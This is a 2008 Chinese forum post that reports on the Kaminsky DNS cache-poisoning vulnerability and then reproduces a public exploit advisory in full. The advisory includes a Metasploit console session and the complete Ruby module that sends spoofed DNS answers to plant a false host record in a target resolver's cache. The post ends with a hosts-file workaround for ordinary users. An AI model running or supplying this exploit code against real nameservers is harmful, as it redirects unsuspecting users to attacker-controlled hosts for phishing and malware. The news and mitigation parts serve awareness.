| harddisk 发表于 2008-7-25 13:02 只看TA 1楼 |
|---|
|
|
[交流] DNS漏洞攻击代码现身 普通网民需谨防钓鱼攻击 DNS漏洞攻击代码现身 普通网民将成攻击对象北京时间7月24日消息,据国外媒体报道,一个互联网域名服务器(DNS)重大漏洞的生成机制和技术细节周一被美国安全公司Matasano“出于疏忽大意”曝光后,开源安全漏洞检测工具Metasploit开发者们周三已发布了针对该DNS漏洞的攻击代码。安全专家表示,如果某家互联网服务供应商 (ISP)没有安装相应漏洞补丁程序,则黑客们可针对使用该ISP服务的普通网民发起“网络钓鱼 ”(phishing)攻击,而这些网民根本无法意识到自己已被攻击。 今年年初,美国网络安全产品和服务提供商IOActive安全研究员丹·卡明斯基(Dan Kaminsky)首先发现了这一严重DNS漏洞,他随后与微软等科技巨头取得了联系。各大计算机业巨头已于7月8日发布了一款软件补丁。 安全专家称,对于那些还没有给服务器安装该DNS漏洞补丁的ISP来说,黑客们可针对使用该 ISP服务的普通网民发起攻击。其方式是在网民进行各种程序升级时,黑客们将悄悄把这些网民的访问地址转到一台假冒服务器上面;在用户进行软件升级的过程当中,自己机器上已被安装了恶意软件。 美国知名杀毒软件开发商赛门铁克(Symantec)技术主管祖尔菲卡·拉米扎(Zulfikar Ramizan)对此表示:“该DNS攻击的可怕之处就在于:在发生上述攻击时,普通终端电脑用户根本就不会觉察到任何异常现象。” 漏洞细节被泄露 卡明斯基此前曾表示,在各大企业用户安装这款DNS漏洞补丁之前,不会对外公布该漏洞的技术细节,而会等到在今年8月举行的“黑帽”(Black Hat)安全技术大会上再公布相关资料。但本周一Matasano不慎在公司博客上披露了该漏洞的技术详情。虽然Matasano随即删除了这篇文章,但相关内容已被多家网站转载。 尽管该DNS漏洞补丁已于7月8日发布,但目前全球绝大多数企业用户仍没有安装该补丁,原因是这些企业用户需首先检测该补丁的兼容性。安全公司ISC总裁保罗·维克西(Paul Vixie)对此表示:“多数企业目前还没有安装该DNS补丁,这可是个大问题。” 另一家安全公司Trusteer首席技术官(CTO)阿米特·克莱恩(Amit Klein)则表示,周三出现的DNS漏洞攻击代码“看起来是真的”;利用该攻击代码,黑客们将可针对还没有安装补丁的DNS服务器发起攻击。他说:“这种攻击危害性极大。如果攻击者很狡猾,我们根本就不会发觉自己已遭到攻击。” 代码及细节: http://www.caughq.org/exploits/CAU-EX-2008-0002.txt [Copy to clipboard] [ - ] CODE: ____ ____ __ __ / \ / \ | | | | ----====####/ /\__\##/ /\ \##| |##| |####====---- | | | |__| | | | | | | | ___ | __ | | | | | ------======######\ \/ /#| |##| |#| |##| |######======------ \____/ |__| |__| \______/ Computer Academic Underground http://www.caughq.org Exploit Code ===============/======================================================== Exploit ID: CAU-EX-2008-0002 Release Date: 2008.07.23 Title: bailiwicked_host.rb Description: Kaminsky DNS Cache Poisoning Flaw Exploit Tested: BIND 9.4.1-9.4.2 Attributes: Remote, Poison, Resolver, Metasploit Exploit URL: http://www.caughq.org/exploits/CAU-EX-2008-0002.txt Author/Email: I)ruid <druid (@) caughq.org> H D Moore <hdm (@) metasploit.com> ===============/======================================================== Description =========== This exploit targets a fairly ubiquitous flaw in DNS implementations which allow the insertion of malicious DNS records into the cache of the target nameserver. This exploit caches a single malicious host entry into the target nameserver. By causing the target nameserver to query for random hostnames at the target domain, the attacker can spoof a response to the target server including an answer for the query, an authority server record, and an additional record for that server, causing target nameserver to insert the additional record into the cache. Example ======= # /msf3/msfconsole _ _ _ _ | | | | (_) | _ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_ | '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __| | | | | | | __/ || (_| \__ \ |_) | | (_) | | |_ |_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__| | | |_| =[ msf v3.2-release + -- --=[ 298 exploits - 124 payloads + -- --=[ 18 encoders - 6 nops =[ 72 aux msf > use auxiliary/spoof/dns/bailiwicked_host msf auxiliary(bailiwicked_host) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- HOSTNAME pwned.example.com yes Hostname to hijack NEWADDR 1.3.3.7 yes New address for hostname RECONS 208.67.222.222 yes Nameserver used for reconnaissance RHOST yes The target address SRCPORT yes The target server's source query port (0 for automatic) XIDS 10 yes Number of XIDs to try for each query msf auxiliary(bailiwicked_host) > set RHOST A.B.C.D RHOST => A.B.C.D msf auxiliary(bailiwicked_host) > check msf auxiliary(bailiwicked_host) > set SRCPORT 0 SRCPORT => 0 msf auxiliary(bailiwicked_host) > run msf auxiliary(bailiwicked_host) > msf auxiliary(bailiwicked_host) > nslookup pwned.example.com A.B.C.D Server: A.B.C.D Address: A.B.C.D#53 Non-authoritative answer: Name: pwned.example.com Address: 1.3.3.7 Credits ======= Dan Kaminsky is credited with originally discovering this vulnerability. References ========== http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447 http://www.kb.cert.org/vuls/id/800113 Metasploit ========== require 'msf/core' require 'net/dns' require 'scruby' require 'resolv' module Msf class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary include Exploit::Remote::Ip def initialize(info = {}) super(update_info(info, 'Name' => 'DNS BailiWicked Host Attack', 'Description' => %q{ This exploit attacks a fairly ubiquitous flaw in DNS implementations which Dan Kaminsky found and disclosed ~Jul 2008. This exploit caches a single malicious host entry into the target nameserver by sending random sub-domain queries to the target DNS server coupled with spoofed replies to those queries from the authoritative nameservers for the domain which contain a malicious host entry for the hostname to be poisoned in the authority and additional records sections. Eventually, a guessed ID will match and the spoofed packet will get accepted, and due to the additional hostname entry being within bailiwick constraints of the original request the malicious host entry will get cached. }, 'Author' => [ 'I)ruid', 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 5585 $', 'References' => [ [ 'CVE', '2008-1447' ], [ 'US-CERT-VU', '8000113' ], [ 'URL', 'http://www.caughq.org/exploits/CAU-EX-2008-0002.txt' ], ], 'Privileged' => true, 'Targets' => [ ["BIND", { 'Arch' => ARCH_X86, 'Platform' => 'linux', }, ], ], 'DisclosureDate' => 'Jul 21 2008' )) register_options( [ OptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]), OptString.new('HOSTNAME', [true, 'Hostname to hijack', 'pwned.example.com']), OptAddress.new('NEWADDR', [true, 'New address for hostname', '1.3.3.7']), OptAddress.new('RECONS', [true, 'Nameserver used for reconnaissance', '208.67.222.222']), OptInt.new('XIDS', [true, 'Number of XIDs to try for each query', 10]), OptInt.new('TTL', [true, 'TTL for the malicious host entry', 31337]), ], self.class) end def auxiliary_commands return { "check" => "Determine if the specified DNS server (RHOST) is vulnerable" } end def cmd_check(*args) targ = args[0] || rhost() if(not (targ and targ.length > 0)) print_status("usage: check [dns-server]") return end print_status("Using the Metasploit service to verify exploitability...") srv_sock = Rex::Socket.create_udp( 'PeerHost' => targ, 'PeerPort' => 53 ) random = false ports = [] lport = nil 1.upto(5) do |i| req = Resolv::DNS::Message.new txt = "spoofprobe-check-#{i}-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com" req.add_question(txt, Resolv::DNS::Resource::IN::TXT) req.rd = 1 srv_sock.put(req.encode) res, addr = srv_sock.recvfrom() if res and res.length > 0 res = Resolv::DNS::Message.decode(res) res.each_answer do |name, ttl, data| if (name.to_s == txt and data.strings.join('') =~ /^([^\s]+)\s+.*red\.metasploit\.com/m) t_addr, t_port = $1.split(':') print_status(" >> ADDRESS: #{t_addr} PORT: #{t_port}") t_port = t_port.to_i if(lport and lport != t_port) random = true end lport = t_port ports << t_port end end end end srv_sock.close if(ports.length < 5) print_status("UNKNOWN: This server did not reply to our vulnerability check requests") return end if(random) print_status("PASS: This server does not use a static source port. Ports: #{ports.join(", ")}") print_status(" This server may still be exploitable, but not by this tool.") else print_status("FAIL: This server uses static source ports and is vulnerable to poisoning") end end def run target = rhost() source = Rex::Socket.source_address(target) sport = datastore['SRCPORT'] hostname = datastore['HOSTNAME'] + '.' address = datastore['NEWADDR'] recons = datastore['RECONS'] xids = datastore['XIDS'].to_i ttl = datastore['TTL'].to_i xidbase = rand(4)+2*10000 domain = hostname.match(/[^\x2e]+\x2e[^\x2e]+\x2e$/)[0] srv_sock = Rex::Socket.create_udp( 'PeerHost' => target, 'PeerPort' => 53 ) # Get the source port via the metasploit service if it's not set if sport.to_i == 0 req = Resolv::DNS::Message.new txt = "spoofprobe-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com" req.add_question(txt, Resolv::DNS::Resource::IN::TXT) req.rd = 1 srv_sock.put(req.encode) res, addr = srv_sock.recvfrom() if res and res.length > 0 res = Resolv::DNS::Message.decode(res) res.each_answer do |name, ttl, data| if (name.to_s == txt and data.strings.join('') =~ /^([^\s]+)\s+.*red\.metasploit\.com/m) t_addr, t_port = $1.split(':') sport = t_port.to_i print_status("Switching to target port #{sport} based on Metasploit service") if target != t_addr print_status("Warning: target address #{target} is not the same as the nameserver's query source address #{t_addr}!") end end end end end # Verify its not already cached begin query = Resolv::DNS::Message.new query.add_question(hostname, Resolv::DNS::Resource::IN::A) query.rd = 0 begin cached = false srv_sock.put(query.encode) answer, addr = srv_sock.recvfrom() if answer and answer.length > 0 answer = Resolv::DNS::Message.decode(answer) answer.each_answer do |name, ttl, data| if((name.to_s + ".") == hostname and data.address.to_s == address) t = Time.now + ttl print_status("Failure: This hostname is already in the target cache: #{name} == #{address}") print_status(" Cache entry expires on #{t.to_s}... sleeping.") cached = true sleep ttl end end end end until not cached rescue ::Interrupt raise $! rescue ::Exception => e print_status("Error checking the DNS name: #{e.class} #{e} #{e.backtrace}") end res0 = Net::DNS::Resolver.new(:nameservers => [recons], :dns_search => false, :recursive => true) # reconnaissance resolver print_status "Targeting nameserver #{target} for injection of #{hostname} as #{address}" # Look up the nameservers for the domain print_status "Querying recon nameserver for #{domain}'s nameservers..." answer0 = res0.send(domain, Net::DNS::NS) #print_status " Got answer with #{answer0.header.anCount} answers, #{answer0.header.nsCount} authorities" barbs = [] # storage for nameservers answer0.answer.each do |rr0| print_status " Got an #{rr0.type} record: #{rr0.inspect}" if rr0.type == 'NS' print_status " Querying recon nameserver for address of #{rr0.nsdname}..." answer1 = res0.send(rr0.nsdname) # get the ns's answer for the hostname #print_status " Got answer with #{answer1.header.anCount} answers, #{answer1.header.nsCount} authorities" answer1.answer.each do |rr1| print_status " Got an #{rr1.type} record: #{rr1.inspect}" res2 = Net::DNS::Resolver.new(:nameservers => rr1.address, :dns_search => false, :recursive => false, :retry => 1) print_status " Checking Authoritativeness: Querying #{rr1.address} for #{domain}..." answer2 = res2.send(domain) if answer2 and answer2.header.auth? and answer2.header.anCount >= 1 nsrec = {:name => rr0.nsdname, :addr => rr1.address} barbs << nsrec print_status " #{rr0.nsdname} is authoritative for #{domain}, adding to list of nameservers to spoof as" end end end end if barbs.length == 0 print_status( "No DNS servers found.") srv_sock.close disconnect_ip return end # Flood the target with queries and spoofed responses, one will eventually hit queries = 0 responses = 0 connect_ip if not ip_sock print_status( "Attempting to inject a poison record for #{hostname} into #{target}:#{sport}...") while true randhost = Rex::Text.rand_text_alphanumeric(12) + '.' + domain # randomize the hostname # Send spoofed query req = Resolv::DNS::Message.new req.id = rand(2**16) req.add_question(randhost, Resolv::DNS::Resource::IN::A) req.rd = 1 buff = ( Scruby::IP.new( #:src => barbs[0][:addr].to_s, :src => source, :dst => target, :proto => 17 )/Scruby::UDP.new( :sport => (rand((2**16)-1024)+1024).to_i, :dport => 53 )/req.encode ).to_net ip_sock.sendto(buff, target) queries += 1 # Send evil spoofed answer from ALL nameservers (barbs req.add_answer(randhost, ttl, Resolv::DNS::Resource::IN::A.new(address)) req.add_authority(domain, ttl, Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(hostname))) req.add_additional(hostname, ttl, Resolv::DNS::Resource::IN::A.new(address)) req.qr = 1 req.ra = 1 xidbase.upto(xidbase+xids-1) do |id| req.id = id barbs.each do |barb| buff = ( Scruby::IP.new( #:src => barbs[:addr].to_s, :src => barb[:addr].to_s, :dst => target, :proto => 17 )/Scruby::UDP.new( :sport => 53, :dport => sport.to_i )/req.encode ).to_net ip_sock.sendto(buff, target) responses += 1 end end # status update if queries % 1000 == 0 print_status("Sent #{queries} queries and #{responses} spoofed responses...") end # every so often, check and see if the target is poisoned... if queries % 250 == 0 begin query = Resolv::DNS::Message.new query.add_question(hostname, Resolv::DNS::Resource::IN::A) query.rd = 0 srv_sock.put(query.encode) answer, addr = srv_sock.recvfrom() if answer and answer.length > 0 answer = Resolv::DNS::Message.decode(answer) answer.each_answer do |name, ttl, data| if((name.to_s + ".") == hostname and data.address.to_s == address) print_status("Poisoning successful after #{queries} attempts: #{name} == #{address}") disconnect_ip return end end end rescue ::Interrupt raise $! rescue ::Exception => e print_status("Error querying the DNS name: #{e.class} #{e} #{e.backtrace}") end end end end end end 简单的说你经常去的站点,当你使用域名访问时,如果你的DNS服务器缓存中毒后,会解析给你恶意站点的IP,引导你去访问它,然而你却以为是正常访问,在不知不觉中使你帐号被窃取,中了木马...... 很快就会有自动化攻击工具出现了 我们客户机临时防范措施很简单,在host文件中手动加入你经常去的站点,然后耐心等待互联网上的DNS服务器补掉漏洞。 |
| 0 |
| 作者的其他主题 |
|---|
| 英特尔四核移动处理器八月推出 |
